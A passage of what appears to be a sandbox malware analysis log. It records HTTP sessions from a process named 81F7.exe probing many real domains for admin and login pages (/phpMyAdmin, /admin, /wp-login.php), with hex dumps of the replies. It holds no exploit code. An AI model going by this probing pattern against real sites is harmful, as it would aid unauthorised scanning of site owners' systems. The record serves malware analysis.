78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:18 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.6	51046	13.232.255.130	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	1406	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:18 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:18 GMT; Max-Age=2592000; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: phpMyAdmin_https=a70qfc3g0vu9p754f85kck34n3; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Last-Modified: Tue, 20 Feb 2024 23:26:18 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
2024-02-20 23:26:18 UTC	6786	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:18 UTC	1412	IN	Data Raw: 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 69 6e 75 74 65 54 65 78 74 20 3d 20 27 4d 69 6e 75 74 65 27 3b 0a 20 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 Data Ascii: egional[''].minuteText = 'Minute'; $.timepicker.regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020fi
2024-02-20 23:26:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:18 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 31 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 Data Ascii: 20001\u007D'), max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equ
2024-02-20 23:26:18 UTC	6	IN	Data Raw: 20 20 3c 6f 70 74 Data Ascii: <opt
2024-02-20 23:26:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:18 UTC	2047	IN	Data Raw: 37 65 38 0d 0a 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 75 6b 22 3e 26 23 31 30 35 39 3b 26 23 31 30 38 32 3b 26 23 31 30 38 38 3b 26 23 31 30 37 32 3b 26 23 31 31 31 31 3b 26 23 31 30 38 35 3b 26 23 31 30 38 39 3b 26 23 31 31 30 30 3b 26 23 31 30 38 32 3b 26 23 31 30 37 32 3b 20 2d 20 55 6b 72 61 69 6e 69 Data Ascii: 7e8ion value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option> <option value="uk">Українська - Ukraini

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.6	51746	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	165	OUT	GET /admin HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_MMuqzHc8qmHLkjV8zbSav3pnYYW9skP3AmKsqAMiOuMJv/qc9POigVrSJ5jXax7y8O5yhHQHZ4bExYruoV5Jnw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:18 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.6	51492	3.33.130.190	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	168	OUT	GET /admin HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YKQUzAEONVAtPtsG4Yzo9mWF7bAKWluVb6sJ+iFJUwNVloyZISuOBW6eq0WY3+8ICBumwMw+KwrgYdEvIusjfA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:17 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.6	51612	13.248.169.48	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	169	OUT	GET /admin HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aR0VkpBmn9lirUvL+TDyovTf7gd+tZNIkF2SAtDxnjbZFdpyS2QEqWcwMMZlCbqYaJHV7/Ws8FmQN0vwkLTbkw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:17 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.6	51644	51.159.190.167	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	179	OUT	GET /wp-login.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	446	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Cache-Status: MISS X-Powered-By: PleskLin
2024-02-20 23:26:18 UTC	8725	IN	Data Raw: 31 63 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1cf4<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
240	192.168.2.6	51501	86.105.245.69	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	175	OUT	GET /admin.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	179	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 159 Connection: close Vary: Accept-Encoding
2024-02-20 23:26:18 UTC	159	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
241	192.168.2.6	51635	144.91.85.110	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	165	OUT	GET /admin HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:18 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
242	192.168.2.6	51740	15.161.71.77	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:17 UTC	182	OUT	GET /phpMyAdmin HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	418	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Cache-Control: no-cache, private Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:18 UTC	7	IN	Data Raw: 31 62 66 63 65 0d 0a Data Ascii: 1bfce
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 30 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 20 70 61 67 69 6e 61 20 6e 